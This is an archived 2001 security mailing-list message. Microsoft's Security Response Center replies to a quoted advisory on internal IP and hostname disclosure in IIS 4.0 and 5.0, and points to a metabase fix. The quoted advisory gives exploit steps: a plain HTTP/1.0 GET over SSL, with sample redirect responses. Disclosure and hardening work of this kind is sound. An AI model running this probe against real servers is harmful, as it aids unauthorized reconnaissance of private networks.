RE: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0

From: Microsoft Security Response Center (secureat_private)
Date: Thu Aug 09 2001 - 10:24:52 PDT

  • Next message: antirez: "Fetchmail security advisory"

    The checklists for securing IIS4 and IIS5 discuss this issue.
    Specifically:
    
    "Disable IP Address in Content-Location 
    The Content-Location header may expose internal IP addresses that are
    usually hidden or masked behind a Network Address Translation (NAT)
    Firewall or proxy server. Refer to Q218180 for further information about
    disabling this option."
    
    The referenced Knowledge Base Article contains information on how to
    force IIS to use the FQDN instead of the IP address.  
    
    (Q218180) Internet Information Server Returns IP Address in HTTP Header
    (Content-Location) -
    http://support.microsoft.com/directory/article.asp?id=KB;EN-US;Q218180
    "There is a value that can be modified in the IIS metabase to change the
    default behavior from exposing IP addresses to send the FQDN instead.
    This allows the IP address to be masked by the domain name."
    
    
    The IIS4 checklist is available here:
    http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsol
    utions/security/tools/iischk.asp
    
    And the IIS5 checklist here:
    http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsol
    utions/security/tools/iis5chk.asp
    
    Regards,
    
    Secureat_private
    
    -----Original Message-----
    From: Marek Roy [mailto:marek_royat_private] 
    Sent: Tuesday, August 07, 2001 9:55 PM
    To: bugtraqat_private
    Subject: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0
    
    
    GGS-AU / e-Synergies Security Advisory
    
    August 8, 2001
    
    
    
    Internal IP Address Disclosure in Microsoft-IIS 4.0 & 
    
    5.0
    
    
    
    Synopsis:
    
    
    
    e-Synergies has discovered and researched remote 
    
    vulnerability in Internet Information Server from 
    
    Microsoft.  Successful
    
    exploitation of this vulnerability can reveal critical 
    
    internal information such as Internal IP Address or 
    
    Internal host name.
    
    
    
    Affected Versions:
    
    
    
    Microsoft IIS 4.0 running SSL
    
    Microsoft IIS 5.0 running SSL
    
    
    
    Description:
    
    
    
    By connecting manually to port TCP/443 (SSL) using 
    
    Perl(SSLeay) or any other tools, a remote user has 
    
    the ability to retrieve
    
    Internal IP address or reveal the machine's network 
    
    node hostname.
    
    
    
    Exploit:
    
    
    
    1-      Browse the web site using a normal SSL 
    
    browser and find any directory. I.E.: 
    
    https://www.target.com/images/icon.gif
    
    
    
    2-      Using a compatible SSL Perl script, execute the 
    
    following command once connected to port 443 of 
    
    www.target.com:
    
    
    
            GET /images HTTP/1.0
    
    
    
    3-      The result should look like this:
    
    
    
            HTTP/1.1 302 Object Moved
    
            Location: https://192.168.1.10/images/
    
            Server: Microsoft-IIS/4.0
    
            Content-Type: text/html
    
            Content-Length: xxx
    
    
    
            or
    
    
    
            HTTP/1.1 302 Object Moved
    
            Location: https://netbiosname/images/
    
            Server: Microsoft-IIS/4.0
    
            Content-Type: text/html
    
            Content-Length: xxx
    
    
    
    Remarks:
    
    
    
    Using HTTP/1.1 instead of HTTP/1.0 will not give the 
    
    same result.
    
    
    
    Credits:
    
    
    
    Marek Roy
    
    Senior IT Security Consultant
    
    
    
    Please send suggestions, updates, and comments to:
    
    
    
    GGS-AU / e-synergies, Sydney, Australia 
    
    
    
    Level 9
    
    65 York Street
    
    Sydney NSW 2001
    
    Australia
    
    
    
    Phone: +61 2 9279 2533
    
    Fax: +61 2 9279 2544
    
    Email: enquiries@ggs-au.com
    
    http://www.ggs-au.com
    



    This archive was generated by hypermail 2b30 : Thu Aug 09 2001 - 16:37:29 PDT